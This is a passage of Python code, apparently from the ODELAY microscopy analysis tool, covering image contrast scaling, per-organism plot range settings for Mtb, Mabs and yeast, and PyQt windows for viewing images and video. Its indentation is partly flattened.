stitchCorners = roiData['stitchMeta'][stInd]['imPix']
# breakpoint()
anImage = opl.assembleImage(imageFilePath, pixSize, magnification, background, stitchCorners)
im = anImage['Bf']
# im = opl.SobelGradient(im)
imSize = im.shape
# This data should be recorded from image display to make sure the image is visible.
imageHist = histogram1d(im.ravel(),2**16,[0,2**16],weights = None).astype('float')
# Calculate the cumulative probability ignoring zero values
cumHist = np.cumsum(imageHist)
cumProb = (cumHist-cumHist[0])/(cumHist[2**16-1]-cumHist[0])
    # set low and high values to normalize image contrast.
loval = np.argmax(cumProb>0.00001)
hival = np.argmax(cumProb>=0.9995)
adjIm = np.array((im.astype('float') - loval.astype('float'))/(hival.astype('float') - loval.astype('float'))*254, dtype = 'uint8')
rsIm = cv2.resize(adjIm, (round(imSize[1]/5), round(imSize[0]/5)))
cv2.imshow('Display Image', rsIm)
k = cv2.waitKey(0)
if k == 107 or k == -1:
cv2.destroyWindow('Display Image')
return k
def setPlotRange(organism=None):
plotRange = {}
plotRange['Mtb'] = {}
plotRange['Mtb']['GCs'] = {}
plotRange['Mtb']['Dbl'] = {}
plotRange['Mtb']['Lag'] = {}
plotRange['Mtb']['Tex'] = {}
plotRange['Mtb']['Area'] = {}
plotRange['Mtb']['NumDbl'] = {}
plotRange['Mtb']['PopNum'] = {}
plotRange['Mtb']['GCs']['xRange'] = [0, 170]
plotRange['Mtb']['GCs']['yRange'] = [4, 14]
plotRange['Mtb']['GCs']['xTicks'] = np.arange(0,100,20)
plotRange['Mtb']['GCs']['xLabel'] = 'Hours'
plotRange['Mtb']['GCs']['titleFrag'] = 'Dbl Time Hr'
plotRange['Mtb']['GCs']['devisor'] = 60
plotRange['Mtb']['GCs']['numObservations'] = 20
plotRange['Mtb']['Dbl']['xRange'] = [0, 100]
plotRange['Mtb']['Dbl']['xTicks'] = [20,40,60,80]
plotRange['Mtb']['Dbl']['xStep'] = 5
plotRange['Mtb']['Dbl']['xLabel'] = 'Hours'
plotRange['Mtb']['Dbl']['titleFrag'] = 'Dbl Time Hr'
plotRange['Mtb']['Dbl']['devisor'] = 60
plotRange['Mtb']['Lag']['xRange'] = [0, 100]
plotRange['Mtb']['Lag']['xTicks'] = [20,40,60,80]
plotRange['Mtb']['Lag']['xStep'] = 2
plotRange['Mtb']['Lag']['xLabel'] = 'Hours'
plotRange['Mtb']['Lag']['titleFrag'] = 'Lag Time Hr'
plotRange['Mtb']['Lag']['devisor'] = 60
plotRange['Mtb']['Tex']['xRange'] = [0, 100]
plotRange['Mtb']['Tex']['xTicks'] = [20,40,60,80]
plotRange['Mtb']['Tex']['xStep'] = 2
plotRange['Mtb']['Tex']['xLabel'] = 'Hours'
plotRange['Mtb']['Tex']['titleFrag'] = 'Tex Hr'
plotRange['Mtb']['Tex']['devisor'] = 30
plotRange['Mtb']['Area']['xRange'] = [0, 30]
plotRange['Mtb']['Area']['xTicks'] = [2,4,6,8]
plotRange['Mtb']['Area']['xStep'] = 0.25
plotRange['Mtb']['Area']['xLabel'] = 'log2 Pixels'
plotRange['Mtb']['Area']['titleFrag'] = 'log2 Area'
plotRange['Mtb']['Area']['devisor'] = 1
plotRange['Mtb']['NumDbl']['xRange'] = [0, 10]
plotRange['Mtb']['NumDbl']['xTicks'] = [2,4,6,8]
plotRange['Mtb']['NumDbl']['xStep'] = 0.25
plotRange['Mtb']['NumDbl']['xLabel'] = 'Num Dbl Rel'
plotRange['Mtb']['NumDbl']['titleFrag'] = 'Num Dbl Rel'
plotRange['Mtb']['NumDbl']['devisor'] = 1
plotRange['Mtb']['PopNum']['xRange'] = [0, 10000]
plotRange['Mtb']['PopNum']['xTicks'] = [10,100,1000]
plotRange['Mtb']['PopNum']['xStep'] = 10
plotRange['Mtb']['PopNum']['xLabel'] = 'log10 Pop'
plotRange['Mtb']['PopNum']['titleFrag'] = 'Pop Num'
plotRange['Mtb']['PopNum']['devisor'] = 1
plotRange['Mabs'] = {}
plotRange['Mabs']['GCs'] = {}
plotRange['Mabs']['Dbl'] = {}
plotRange['Mabs']['Lag'] = {}
plotRange['Mabs']['Tex'] = {}
plotRange['Mabs']['Area'] = {}
plotRange['Mabs']['NumDbl'] = {}
plotRange['Mabs']['PopNum'] = {}
plotRange['Mabs']['GCs']['xRange'] = [0, 70]
plotRange['Mabs']['GCs']['yRange'] = [4, 16]
plotRange['Mabs']['GCs']['xTicks'] = np.arange(0,70,10)
plotRange['Mabs']['GCs']['xLabel'] = 'Hours'
plotRange['Mabs']['GCs']['titleFrag'] = 'Dbl Time Hr'
plotRange['Mabs']['GCs']['devisor'] = 60
plotRange['Mabs']['GCs']['numObservations'] = 20
plotRange['Mabs']['Dbl']['xRange'] = [0, 10]
plotRange['Mabs']['Dbl']['xTicks'] = [2,4,6,8]
plotRange['Mabs']['Dbl']['xStep'] = 0.5
plotRange['Mabs']['Dbl']['xLabel'] = 'Hours'
plotRange['Mabs']['Dbl']['titleFrag'] = 'Dbl Time Hr'
plotRange['Mabs']['Dbl']['devisor'] = 60
plotRange['Mabs']['Lag']['xRange'] = [0, 40]
plotRange['Mabs']['Lag']['xTicks'] = [10,20,30]
plotRange['Mabs']['Lag']['xStep'] = 1
plotRange['Mabs']['Lag']['xLabel'] = 'Hours'
plotRange['Mabs']['Lag']['titleFrag'] = 'Lag Time Hr'
plotRange['Mabs']['Lag']['devisor'] = 60
plotRange['Mabs']['Tex']['xRange'] = [0, 40]
plotRange['Mabs']['Tex']['xTicks'] = [10,20,30]
plotRange['Mabs']['Tex']['xStep'] = 1
plotRange['Mabs']['Tex']['xLabel'] = 'Hours'
plotRange['Mabs']['Tex']['titleFrag'] = 'Tex Hr'
plotRange['Mabs']['Tex']['devisor'] = 30
plotRange['Mabs']['Area']['xRange'] = [0, 30]
plotRange['Mabs']['Area']['xTicks'] = [20,40,60,80]
plotRange['Mabs']['Area']['xStep'] = 0.25
plotRange['Mabs']['Area']['xLabel'] = 'log2 Pixels'
plotRange['Mabs']['Area']['titleFrag'] = 'log2 Area'
plotRange['Mabs']['Area']['devisor'] = 1
plotRange['Mabs']['NumDbl']['xRange'] = [0, 10]
plotRange['Mabs']['NumDbl']['xTicks'] = [2,4,6,8]
plotRange['Mabs']['NumDbl']['xStep'] = 0.25
plotRange['Mabs']['NumDbl']['xLabel'] = 'log2 Pixels'
plotRange['Mabs']['NumDbl']['titleFrag'] = 'Num Dbl Rel'
plotRange['Mabs']['NumDbl']['devisor'] = 1
plotRange['Mabs']['PopNum']['xRange'] = [0, 10000]
plotRange['Mabs']['PopNum']['xTicks'] = [10,100,1000]
plotRange['Mabs']['PopNum']['xStep'] = 10
plotRange['Mabs']['PopNum']['xLabel'] = 'log10 Pop'
plotRange['Mabs']['PopNum']['titleFrag'] = 'Pop Num'
plotRange['Mabs']['PopNum']['devisor'] = 1
plotRange['Yeast'] = {}
plotRange['Yeast']['GCs'] = {}
plotRange['Yeast']['Dbl'] = {}
plotRange['Yeast']['Lag'] = {}
plotRange['Yeast']['Tex'] = {}
plotRange['Yeast']['Area'] = {}
plotRange['Yeast']['NumDbl'] = {}
plotRange['Yeast']['PopNum'] = {}
plotRange['Yeast']['GCs']['xRange'] = [0, 3000]
plotRange['Yeast']['GCs']['yRange'] = [4, 16]
plotRange['Yeast']['GCs']['xTicks'] = [100,200,300,400]
plotRange['Yeast']['GCs']['xStep'] = 4
plotRange['Yeast']['GCs']['xLabel'] = 'Minutes'
plotRange['Yeast']['GCs']['titleFrag'] = 'Time Min'
plotRange['Yeast']['GCs']['devisor'] = 1
plotRange['Yeast']['GCs']['numObservations'] = 10
plotRange['Yeast']['Dbl']['xRange'] = [25, 400]
plotRange['Yeast']['Dbl']['xTicks'] = [100,200,300,400]
plotRange['Yeast']['Dbl']['xStep'] = 4
plotRange['Yeast']['Dbl']['xLabel'] = 'Minutes'
plotRange['Yeast']['Dbl']['titleFrag'] = 'Dbl Time Min'
plotRange['Yeast']['Dbl']['devisor'] = 1
plotRange['Yeast']['Lag']['xRange'] = [0, 3000]
plotRange['Yeast']['Lag']['xTicks'] = [100,200,300,400, 500]
plotRange['Yeast']['Lag']['xStep'] = 1
plotRange['Yeast']['Lag']['xLabel'] = 'Minutes'
plotRange['Yeast']['Lag']['titleFrag'] = 'Lag Time Min'
plotRange['Yeast']['Lag']['devisor'] = 1
plotRange['Yeast']['Tex']['xRange'] = [0, 3000]
plotRange['Yeast']['Tex']['xTicks'] = [200,400,600,800,1000]
plotRange['Yeast']['Tex']['xStep'] = 1
plotRange['Yeast']['Tex']['xLabel'] = 'Minutes'
plotRange['Yeast']['Tex']['titleFrag'] = 'Tex Min'
plotRange['Yeast']['Tex']['devisor'] = 0.5
plotRange['Yeast']['Area']['xRange'] = [0, 40]
plotRange['Yeast']['Area']['xTicks'] = [10,20,30]
plotRange['Yeast']['Area']['xStep'] = 0.5
plotRange['Yeast']['Area']['xLabel'] = 'log2 Pixels'
plotRange['Yeast']['Area']['titleFrag'] = 'log2 Area'
plotRange['Yeast']['Area']['devisor'] = 1
plotRange['Yeast']['NumDbl']['xRange'] = [0, 10]
plotRange['Yeast']['NumDbl']['xTicks'] = [2,4,6,8]
plotRange['Yeast']['NumDbl']['xStep'] = 0.25
plotRange['Yeast']['NumDbl']['xLabel'] = 'Num Dbl Rel'
plotRange['Yeast']['NumDbl']['titleFrag'] = 'Num Dbl Rel'
plotRange['Yeast']['NumDbl']['devisor'] = 1
plotRange['Yeast']['PopNum']['xRange'] = [0, 10000]
plotRange['Yeast']['PopNum']['xTicks'] = [10,100,1000]
plotRange['Yeast']['PopNum']['xStep'] = 10
plotRange['Yeast']['PopNum']['xLabel'] = 'log10 Pop'
plotRange['Yeast']['PopNum']['titleFrag'] = 'Pop Num'
plotRange['Yeast']['PopNum']['devisor'] = 1
if organism is None:
    return plotRange
else:
    return plotRange[organism]
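# Illustrative sketch (added for documentation; not part of the original
# module). It shows how the range table built above is typically consumed
# when binning data. The 'Mtb'/'Dbl' keys are example choices and np is the
# module-level numpy import.
def _exampleHistogramBins(plotRange, organism='Mtb', attr='Dbl'):
    lo, hi = plotRange[organism][attr]['xRange']
    step = plotRange[organism][attr]['xStep']
    return np.arange(lo, hi + step, step)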
def scaleImage(im, lowcut = 0.00001, highcut = 0.9995, scaleImage = 1):
    # Make a histogram of the image at the bit depth at which it was recorded.
imageHist = histogram1d(im.ravel(),2**16,[0,2**16],weights = None).astype('float')
# Calculate the cumulative probability ignoring zero values
cumHist = np.empty(imageHist.shape, dtype='float')
cumHist[0] = 0
cumHist[1:] = np.cumsum(imageHist[1:])
    # Normalize the cumulative histogram to a cumulative probability,
    # ignoring the zero bin (useful when many pixels are exactly zero).
    cumRange = cumHist[2**16-1]-cumHist[0]
    cumHist -= cumHist[0]
    cumHist /= cumRange
    # Set low and high cut values to normalize image contrast.
loval = np.argmax(cumHist>=lowcut)
hival = np.argmax(cumHist>=highcut)
scIm = np.clip(im, loval, hival).astype('float')
    # Scale the image linearly over the given range (no alpha channel is set).
scaleFactor = 254/(hival-loval)
scIm -=loval
scIm *= scaleFactor
adjIm = np.require(scIm, dtype = 'uint8', requirements = 'C')
# resize if you need to
rsIm = cv2.resize(adjIm, (round(im.shape[1]/scaleImage), round(im.shape[0]/scaleImage)))
return rsIm
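# Illustrative usage sketch (added for documentation; not part of the original
# module). 'im16' stands for any 2-D uint16 frame loaded elsewhere; the 2x
# downscale factor is an arbitrary example. cv2 is assumed to be imported at
# the top of this module, as it is used elsewhere in the file.
def _exampleScaleImage(im16):
    # Contrast-stretch the 16-bit frame to uint8 and show it at half size.
    disp = scaleImage(im16, scaleImage=2)
    cv2.imshow('Display Image', disp)
    cv2.waitKey(0)
    cv2.destroyWindow('Display Image')
    return disp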
def parseVirts(x, y):
commands = {'M': (mpath.Path.MOVETO,),
'L': (mpath.Path.LINETO,),
'Q': (mpath.Path.CURVE3,)*2,
'C': (mpath.Path.CURVE4,)*3,
'Z': (mpath.Path.CLOSEPOLY,)}
rc = y.shape
vertices = np.zeros((rc[0]+3,2),dtype='float')
vertices[0,:] = [x[0],y[0]]
codes = []
codes.extend(commands['M'])
for n in range(1,rc[0]):
codes.extend(commands['L'])
vertices[n,:] = [x[n],y[n]]
    # Drop to the baseline at the last x value, return to the origin,
    # then close the polygon (the CLOSEPOLY vertex is ignored by matplotlib).
    vertices[-3,:] = [x[-1],0]
    codes.extend(commands['L'])
    vertices[-2,:] = [0,0]
    codes.extend(commands['L'])
    vertices[-1,:] = [0,0]
    codes.extend(commands['Z'])
return codes, vertices
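# Illustrative sketch (added for documentation; not part of the original
# module). parseVirts returns matplotlib path codes/vertices describing a
# closed fill-under-curve polygon; this shows how they could be turned into a
# PathPatch. 'ax' is an assumed matplotlib Axes handle; mpath/mpatches are the
# module-level matplotlib.path/matplotlib.patches imports used in this file.
def _examplePathPatch(ax, x, y):
    codes, vertices = parseVirts(x, y)
    path = mpath.Path(vertices, codes)
    patch = mpatches.PathPatch(path, facecolor=[0, 0, 1, 1], edgecolor=None, linewidth=0)
    ax.add_patch(patch)
    return patch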
class OImageView(QtWidgets.QGraphicsView):
photoClicked = QtCore.pyqtSignal(QtCore.QPoint)
def __init__(self, parent):
super(OImageView, self).__init__(parent)
self._zoom = 0
self._empty = True
self._scene = QtWidgets.QGraphicsScene(self)
self._photo = QtWidgets.QGraphicsPixmapItem()
self.qImage = QImage()
self._scene.addItem(self._photo)
self.setScene(self._scene)
self.setTransformationAnchor(QtWidgets.QGraphicsView.AnchorUnderMouse)
self.setResizeAnchor(QtWidgets.QGraphicsView.AnchorUnderMouse)
self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setBackgroundBrush(QtGui.QBrush(QtGui.QColor(30, 30, 30)))
self.setFrameShape(QtWidgets.QFrame.NoFrame)
def hasPhoto(self):
return not self._empty
def fitInView(self, scale=True):
rect = QtCore.QRectF(self._photo.pixmap().rect())
if not rect.isNull():
self.setSceneRect(rect)
if self.hasPhoto():
unity = self.transform().mapRect(QtCore.QRectF(0, 0, 1, 1))
self.scale(1 / unity.width(), 1 / unity.height())
viewrect = self.viewport().rect()
scenerect = self.transform().mapRect(rect)
factor = min(viewrect.width() / scenerect.width(),
viewrect.height() / scenerect.height())
self.scale(factor, factor)
self._zoom = 0
def setPhoto(self, pixmap=None, reset=True):
self._zoom = 0
if pixmap and not pixmap.isNull():
self._empty = False
self.setDragMode(QtWidgets.QGraphicsView.ScrollHandDrag)
self._photo.setPixmap(pixmap)
else:
self._empty = True
self.setDragMode(QtWidgets.QGraphicsView.NoDrag)
self._photo.setPixmap(QtGui.QPixmap())
if reset:
self.fitInView()
def wheelEvent(self, event):
if self.hasPhoto():
if event.angleDelta().y() > 0:
factor = 1.25
self._zoom += 1
else:
factor = 0.8
self._zoom -= 1
if self._zoom > 0:
self.scale(factor, factor)
elif self._zoom == 0:
self.fitInView()
else:
self._zoom = 0
def toggleDragMode(self):
if self.dragMode() == QtWidgets.QGraphicsView.ScrollHandDrag:
self.setDragMode(QtWidgets.QGraphicsView.NoDrag)
elif not self._photo.pixmap().isNull():
self.setDragMode(QtWidgets.QGraphicsView.ScrollHandDrag)
def mousePressEvent(self, event):
if self._photo.isUnderMouse():
self.photoClicked.emit(self.mapToScene(event.pos()).toPoint())
super(OImageView, self).mousePressEvent(event)
# ImageWindow is the main image-viewing window.
class ImageWindow(QtWidgets.QWidget):
'''
ImageWindow: a QWidget which holds the GraphicsView and button elements
'''
def __init__(self):
super(ImageWindow, self).__init__()
# Load experiment and odelayConfig data into Window data.
self.odelayConfig = fio.loadConfig()
self.experimentData = self.loadExperimentData()
self.roiList = [*self.experimentData['roiFiles']]
self.roiLbl = self.roiList[0]
self.numImages=len(self.experimentData['roiFiles'][self.roiLbl])
self.imageNumber = 1
#Create Photoviewer object
self.viewer = OImageView(self)
        # Drop-down list for selecting the region of interest (ROI)
self.selectRoi = QtWidgets.QComboBox(self)
qroiList = [self.tr(item) for item in self.roiList]
self.selectRoi.addItems(qroiList)
self.selectRoi.currentTextChanged.connect(self.chooseRoi)
        # Button to load the previous image
self.btnPrevImage = QtWidgets.QToolButton(self)
self.btnPrevImage.setText('Prev')
self.btnPrevImage.setObjectName('btnPrevImage')
self.btnPrevImage.clicked.connect(self.changeImage)
        # Button to load the next image
self.btnNextImage = QtWidgets.QToolButton(self)
self.btnNextImage.setText('Next')
self.btnNextImage.setObjectName('btnNextImage')
self.btnNextImage.clicked.connect(self.changeImage)
        # Button to save the current image
self.btnSaveImage = QtWidgets.QToolButton(self)
self.btnSaveImage.setText('Save')
self.btnSaveImage.setObjectName('btnSaveImage')
self.btnSaveImage.clicked.connect(self.saveImage)
# Button to change from drag/pan to getting pixel info
self.btnPixInfo = QtWidgets.QToolButton(self)
self.btnPixInfo.setText('Enter pixel info mode')
self.btnPixInfo.clicked.connect(self.pixInfo)
self.editPixInfo = QtWidgets.QLineEdit(self)
self.editPixInfo.setReadOnly(True)
self.viewer.photoClicked.connect(self.photoClicked)
# Add Image time slider
self.imageSlider = QSlider(Qt.Horizontal)
self.imageSlider.setRange(1,self.numImages)
self.imageSlider.sliderReleased.connect(self.changeImage)
# Arrange layout
VBlayout = QtWidgets.QVBoxLayout(self)
VBlayout.addWidget(self.viewer)
VBlayout.addWidget(self.imageSlider)
HBlayout = QtWidgets.QHBoxLayout()
HBlayout.setAlignment(QtCore.Qt.AlignLeft)
HBlayout.addWidget(self.selectRoi)
HBlayout.addWidget(self.btnPrevImage)
HBlayout.addWidget(self.btnNextImage)
HBlayout.addWidget(self.btnSaveImage)
HBlayout.addWidget(self.btnPixInfo)
HBlayout.addWidget(self.editPixInfo)
VBlayout.addLayout(HBlayout)
def chooseRoi(self, ind):
self.roiLbl = ind
self.numImages = len(self.experimentData['roiFiles'][self.roiLbl])
if self.imageNumber>self.numImages:
self.imageNumber = self.numImages
            self.imageSlider.setValue(self.numImages)
self.loadImage()
def loadImage(self):
self.viewer.qImage = self.readImage()
pixmap = QPixmap.fromImage(self.viewer.qImage)
self.viewer.setPhoto(pixmap)
def saveImage(self):
location = self.odelayConfig['LocalDataDir']
options = QFileDialog.Options()
        fileName, _ = QFileDialog.getSaveFileName(self,"Save Image", self.tr(location),"Images (*.png *.jpg)", options=options)
print(fileName)
val = self.viewer.qImage.save(fileName, format=None, quality=100)
if val:
print('Image saved')
def changeImage(self):
sending_widget = self.sender()
if sending_widget.objectName() == self.btnNextImage.objectName():
self.imageNumber += 1
if self.imageNumber>self.numImages:
self.imageNumber = self.numImages
else:
self.viewer.qImage = self.readImage()
pixmap = QPixmap.fromImage(self.viewer.qImage)
self.imageSlider.setValue(self.imageNumber)
self.viewer.setPhoto(pixmap, False)
elif sending_widget.objectName() == self.btnPrevImage.objectName():
self.imageNumber -= 1
if self.imageNumber<1:
self.imageNumber = 1
else:
self.viewer.qImage = self.readImage()
pixmap = QPixmap.fromImage(self.viewer.qImage)
self.imageSlider.setValue(self.imageNumber)
self.viewer.setPhoto(pixmap, False)
elif sending_widget.objectName() == self.imageSlider.objectName():
self.imageNumber = sending_widget.value()
self.viewer.qImage = self.readImage()
pixmap = QPixmap.fromImage(self.viewer.qImage)
self.viewer.setPhoto(pixmap, False)
def pixInfo(self):
self.viewer.toggleDragMode()
def photoClicked(self, pos):
if self.viewer.dragMode() == QtWidgets.QGraphicsView.NoDrag:
self.editPixInfo.setText('%d, %d' % (pos.x(), pos.y()))
    def openFileDialog(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(None,"Select ODELAY Data Set", "","ODELAYExpDisc (*Index_ODELAYData.mat);; Mat-Files (*.mat)", options=options)
return fileName
def loadExperimentData(self):
imagePath = pathlib.Path(self.odelayConfig['LocalImageDir'])
dataPath = pathlib.Path(self.odelayConfig['LocalDataDir'])
indexList = [k for k in dataPath.glob('*Index_ODELAYData.*')]
if len(indexList)==1:
expIndexPath = dataPath / indexList[0]
expData = fio.loadData(expIndexPath)
return expData
def readImage(self, lowcut = 0.0005, highcut = 0.99995):
roiLbl = self.roiLbl
imNum = self.imageNumber
imagePath = pathlib.Path(self.odelayConfig['LocalImageDir'])
dataPath = pathlib.Path(self.odelayConfig['LocalDataDir'])
        # Generate the image file path by combining the region of interest label with the experiment path
roiFolder = pathlib.Path('./'+ roiLbl)
imageFileName = pathlib.Path('./'+ roiLbl + '_'+ f'{imNum:00d}' + '.mat')
imageFilePath = imagePath / roiFolder / imageFileName
        # Load region of interest data. This HDF5 file should contain the image stitch coordinates.
roiPath = dataPath / 'ODELAY Roi Data' / f'{roiLbl}.hdf5'
roiData = fio.loadData(roiPath)
background = self.experimentData['backgroundImage']
# This data should be extracted from the Experiment Index file or stage data file.
pixSize = self.experimentData['pixSize']
magnification = self.experimentData['magnification']
stInd = f'{imNum-1:03d}'
stitchCorners = roiData['stitchMeta'][stInd]['imPix']
anImage = opl.assembleImage(imageFilePath, pixSize, magnification, background, stitchCorners)
im = anImage['Bf']
        # Make a histogram of the image at the bit depth at which it was recorded.
imageHist = histogram1d(im.ravel(),2**16,[0,2**16],weights = None).astype('float')
# Calculate the cumulative probability ignoring zero values
cumHist = np.zeros(imageHist.shape, dtype='float')
cumHist[1:] = np.cumsum(imageHist[1:])
        # Convert to a cumulative probability, ignoring the zero bin.
        cumProb = (cumHist-cumHist[0])/(cumHist[2**16-1]-cumHist[0])
        # Set low and high cut values to normalize image contrast.
loval = np.argmax(cumProb>=lowcut)
hival = np.argmax(cumProb>=highcut)
scIm = (im.astype('float') - loval.astype('float'))/(hival.astype('float') - loval.astype('float'))*254
lim = np.iinfo('uint8')
scIm = np.clip(scIm, lim.min, lim.max)
# Set image data type and make sure the array is contiguous in memory.
imageData = np.require(scIm, dtype = 'uint8', requirements = 'C')
        # Wrap the array in an 8-bit greyscale QImage. Keep a reference to the
        # numpy buffer on the QImage so it is not garbage collected while Qt
        # still points at it.
        Qim = QImage(imageData.data, imageData.shape[1], imageData.shape[0], imageData.shape[1], QImage.Format_Grayscale8)
        Qim.data = imageData
return Qim
class VideoWindow(QMainWindow):
def __init__(self, parent=None):
super(VideoWindow, self).__init__(parent)
self.setWindowTitle("PyQt Video Player Widget Example - pythonprogramminglanguage.com")
self.mediaPlayer = QMediaPlayer(None, QMediaPlayer.VideoSurface)
videoWidget = QVideoWidget()
self.playButton = QPushButton()
self.playButton.setEnabled(False)
self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))
self.playButton.clicked.connect(self.play)
self.positionSlider = QSlider(Qt.Horizontal)
self.positionSlider.setRange(0, 0)
self.positionSlider.sliderReleased.connect(self.setPosition)
self.errorLabel = QLabel()
self.errorLabel.setSizePolicy(QSizePolicy.Preferred,
QSizePolicy.Maximum)
# Create new action
openAction = QAction(QIcon('open.png'), '&Open', self)
openAction.setShortcut('Ctrl+O')
openAction.setStatusTip('Open movie')
openAction.triggered.connect(self.openFile)
# Create exit action
exitAction = QAction(QIcon('exit.png'), '&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(self.exitCall)
# Create menu bar and add action
menuBar = self.menuBar()
fileMenu = menuBar.addMenu('&File')
#fileMenu.addAction(newAction)
fileMenu.addAction(openAction)
fileMenu.addAction(exitAction)
# Create a widget for window contents
wid = QWidget(self)
self.setCentralWidget(wid)
# Create layouts to place inside widget
controlLayout = QHBoxLayout()
controlLayout.setContentsMargins(0, 0, 0, 0)
controlLayout.addWidget(self.playButton)
controlLayout.addWidget(self.positionSlider)
layout = QVBoxLayout()
layout.addWidget(videoWidget)
layout.addLayout(controlLayout)
layout.addWidget(self.errorLabel)
# Set widget to contain window contents
wid.setLayout(layout)
self.mediaPlayer.setVideoOutput(videoWidget)
self.mediaPlayer.stateChanged.connect(self.mediaStateChanged)
self.mediaPlayer.positionChanged.connect(self.positionChanged)
self.mediaPlayer.durationChanged.connect(self.durationChanged)
self.mediaPlayer.error.connect(self.handleError)
def openFile(self):
odelayConfig = fio.loadConfig()
fileName, _ = QFileDialog.getOpenFileName(self, "Open Movie",
odelayConfig['LocalDataDir'])
if fileName != '':
self.mediaPlayer.setMedia(
QMediaContent(QUrl.fromLocalFile(fileName)))
self.playButton.setEnabled(True)
def exitCall(self):
sys.exit(app.exec_())
def play(self):
if self.mediaPlayer.state() == QMediaPlayer.PlayingState:
self.mediaPlayer.pause()
else:
self.mediaPlayer.play()
def mediaStateChanged(self, state):
if self.mediaPlayer.state() == QMediaPlayer.PlayingState:
self.playButton.setIcon(
self.style().standardIcon(QStyle.SP_MediaPause))
else:
self.playButton.setIcon(
self.style().standardIcon(QStyle.SP_MediaPlay))
def positionChanged(self, position):
self.positionSlider.setValue(position)
def durationChanged(self, duration):
self.positionSlider.setRange(0, duration)
def setPosition(self):
position = self.positionSlider.value()
self.mediaPlayer.setPosition(position)
def handleError(self):
self.playButton.setEnabled(False)
self.errorLabel.setText("Error: " + self.mediaPlayer.errorString())
def videoViewer():
app = QApplication(sys.argv)
player = VideoWindow()
player.resize(640, 480)
player.show()
sys.exit(app.exec_())
def imageViewer():
app = QtWidgets.QApplication(sys.argv)
window = ImageWindow()
window.setGeometry(500, 300, 800, 600)
window.show()
window.loadImage()
sys.exit(app.exec_())
def waveLengthToRGB(wl=650):
    try:
        wl = int(wl)
    except (TypeError, ValueError):
        wl = 450
# print(wl)
if wl<380:
wl= 380
elif wl>780:
wl = 780
if wl>=380 and wl<=440:
R = np.abs((wl-440)/(440-380))
G = 0
B = 1
elif wl>440 and wl<=490:
R = 0
G = np.abs((wl-440)/(490-440))
B = 1
elif wl>490 and wl<=510:
R = 0
G = 1
B = np.abs((wl-510)/(510-490))
elif wl>510 and wl<=580:
R = np.abs((wl-510)/(580-510))
G = 1
        B = 0
    elif wl>580 and wl<=645:
        R = 1
G = np.abs((wl-645)/(645-580))
B = 0
elif wl>645 and wl<=780:
R = 1
G = 0
B = 0
    # Let the intensity (SSS) fall off near the limits of vision.
if wl>700:
SSS=0.3+0.7* (780-wl)/(780-700)
elif wl<420:
SSS=.3+.7*(wl-380)/(420-380)
else:
SSS=1
r = np.round(SSS*R*255).astype('uint8')
g = np.round(SSS*G*255).astype('uint8')
b = np.round(SSS*B*255).astype('uint8')
return [r,g,b]
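# Illustrative usage sketch (added for documentation; not part of the original
# module). The 488 nm wavelength is just an example; the uint8 triple returned
# by waveLengthToRGB is rescaled to the 0-1 range that matplotlib colors expect.
def _exampleWavelengthColor(wl=488):
    r, g, b = waveLengthToRGB(wl)
    return [r / 255, g / 255, b / 255]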
# class FocusPlot(QMainWindow):
# def __init__(self, parent=None):
# QMainWindow.__init__(self, parent)
# self.setWindowTitle('Demo: PyQt with matplotlib')
# self.create_menu()
# self.create_main_frame()
# self.create_status_bar()
# self.textbox.setText('1 2 3 4')
# self.on_draw()
# def save_plot(self):
# file_choices = "PNG (*.png)|*.png"
# path, ext = QFileDialog.getSaveFileName(self,
# 'Save file', '',
# file_choices)
# path = path.encode('utf-8')
# if not path[-4:] == file_choices[-4:].encode('utf-8'):
# path += file_choices[-4:].encode('utf-8')
# print(path)
# if path:
# self.canvas.print_figure(path.decode(), dpi=self.dpi)
# self.statusBar().showMessage('Saved to %s' % path, 2000)
# def on_about(self):
# msg = """ A demo of using PyQt with matplotlib:
# * Use the matplotlib navigation bar
# * Add values to the text box and press Enter (or click "Draw")
# * Show or hide the grid
# * Drag the slider to modify the width of the bars
# * Save the plot to a file using the File menu
# * Click on a bar to receive an informative message
# """
# QMessageBox.about(self, "About the demo", msg.strip())
# def on_pick(self, event):
# # The event received here is of the type
# # matplotlib.backend_bases.PickEvent
# #
# # It carries lots of information, of which we're using
# # only a small amount here.
# #
# box_points = event.artist.get_bbox().get_points()
# msg = "You've clicked on a bar with coords:\n %s" % box_points
# QMessageBox.information(self, "Click!", msg)
# def on_draw(self):
# """ Redraws the figure
# """
# str = self.textbox.text().encode('utf-8')
# self.data = [int(s) for s in str.split()]
# x = range(len(self.data))
# # clear the axes and redraw the plot anew
# #
# self.axes.clear()
# self.axes.grid(self.grid_cb.isChecked())
# self.axes.bar(
# x=x,
# height=self.data,
# width=self.slider.value() / 100.0,
# align='center',
# alpha=0.44,
# picker=5)
# self.canvas.draw()
# def create_main_frame(self):
# self.main_frame = QWidget()
# # Create the mpl Figure and FigCanvas objects.
# # 5x4 inches, 100 dots-per-inch
# #
# self.dpi = 100
# self.fig = Figure((5.0, 4.0), dpi=self.dpi)
# self.canvas = FigureCanvas(self.fig)
# self.canvas.setParent(self.main_frame)
# # Since we have only one plot, we can use add_axes
# # instead of add_subplot, but then the subplot
# # configuration tool in the navigation toolbar wouldn't
# # work.
# #
# self.axes = self.fig.add_subplot(111)
# # Bind the 'pick' event for clicking on one of the bars
# #
# self.canvas.mpl_connect('pick_event', self.on_pick)
# # Create the navigation toolbar, tied to the canvas
# #
# self.mpl_toolbar = NavigationToolbar(self.canvas, self.main_frame)
# # Other GUI controls
# #
# self.textbox = QLineEdit()
# self.textbox.setMinimumWidth(200)
# self.textbox.editingFinished.connect(self.on_draw)
# self.draw_button = QPushButton("&Draw")
# self.draw_button.clicked.connect(self.on_draw)
# self.grid_cb = QCheckBox("Show &Grid")
# self.grid_cb.setChecked(False)
# self.grid_cb.stateChanged.connect(self.on_draw)
# slider_label = QLabel('Bar width (%):')
# self.slider = QSlider(Qt.Horizontal)
# self.slider.setRange(1, 100)
# self.slider.setValue(20)
# self.slider.setTracking(True)
# self.slider.setTickPosition(QSlider.TicksBothSides)
# self.slider.valueChanged.connect(self.on_draw)
# #
# # Layout with box sizers
# #
# hbox = QHBoxLayout()
# for w in [ self.textbox, self.draw_button, self.grid_cb,
# slider_label, self.slider]:
